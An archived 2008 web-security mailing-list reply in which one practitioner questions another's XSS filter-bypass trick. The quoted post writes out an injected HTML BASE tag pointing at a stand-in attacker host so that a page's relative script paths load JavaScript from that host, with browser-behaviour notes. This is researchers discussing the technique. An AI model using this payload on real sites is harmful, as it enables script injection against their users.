[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [WEB SECURITY] Nice little XSS trick

From: "Prasad Shenoy" <prasad.shenoy@xxxxxxxxx>
Subject: Re: [WEB SECURITY] Nice little XSS trick
Date: Tue, 15 Jul 2008 12:25:27 -0400

Amit -

When you say observed by FF 2, I guess you mean this should not work
in FF 2 correct? But it works with FF 2.

As this is a very simple example, I would like to believe that you are
assuming that in order to invoke functions from the attacker
controlled JS file (because there is no JS involved in the payload),
the attacker would create a file with the same filename and function
names as the one on the victim's domain. This way the actual (good) JS
file will be overwritten by the attacker controlled JS and all the
functions will be called from cross domain.

Valid?

Thanks
Prasad Shenoy

Prasad Shenoy
On Tue, Jul 15, 2008 at 7:33 AM, Amit Klein <aksecurity@xxxxxxxxx> wrote:
> Hi list
>
> Recently I've been thinking about bypassing anti-XSS filters, and a nice
> little trick occurred to me, which I haven't seen anywhere (e.g. it's not on
> RSnake's XSS cheat sheet - http://ha.ckers.org/xss.html; it does mention
> BASe, but not the trick I describe here). The idea is to use the HTML BASE
> tag to force loading of JS code from the attacker's host. Consider a page
> with XSS vulnerability such as:
>
> <html>
> ...
> ***XSS code may be embedded here***
> ...
> <script src="/foo/bar.js"></script>
> ...
> </html>
>
> Now, an attacker can inject <base href="http://www.attacker.tld/";>, and next
> thing you know, the browser (IE, at least) loads the JS from
> http://www.attacker.tld/foo/bar.js... And the beauty is that there's no
> "explicit" JS code involved in the payload itself.
>
> Note that according to the HTML standard, BASE should be placed in the HEAD
> section (http://www.w3.org/TR/html401/struct/links.html#edef-BASE). This is
> indeed observed by FF 2, but not by IE (checked IE6).
>
> Thanks,
> -Amit
>
>
> ----------------------------------------------------------------------------
> Join us on IRC: irc.freenode.net #webappsec
>
> Have a question? Search The Web Security Mailing List Archives:
> http://www.webappsec.org/lists/websecurity/archive/
>
> Subscribe via RSS: http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
>
> Join WASC on LinkedIn
> http://www.linkedin.com/e/gis/83336/4B20E4374DBA
>
>



-- 
Ah! the joy of hacking....

----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives: 
http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS: 
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA

Follow-Ups:
- Re: [WEB SECURITY] Nice little XSS trick
  - From: Amit Klein
- Re: [WEB SECURITY] Nice little XSS trick
  - From: Ryan Barnett

References:
- [WEB SECURITY] Nice little XSS trick
  - From: Amit Klein

Prev by Date: [WEB SECURITY] Corsaire whitepaper: Breaking the Bank (Vulnerabilities in Numeric Processing within Financial Applications)
Next by Date: Re: [WEB SECURITY] Nice little XSS trick
Previous by thread: [WEB SECURITY] Nice little XSS trick
Next by thread: Re: [WEB SECURITY] Nice little XSS trick
Index(es):
- Date
- Thread

Brought to you by http://www.webappsec.org
Search this site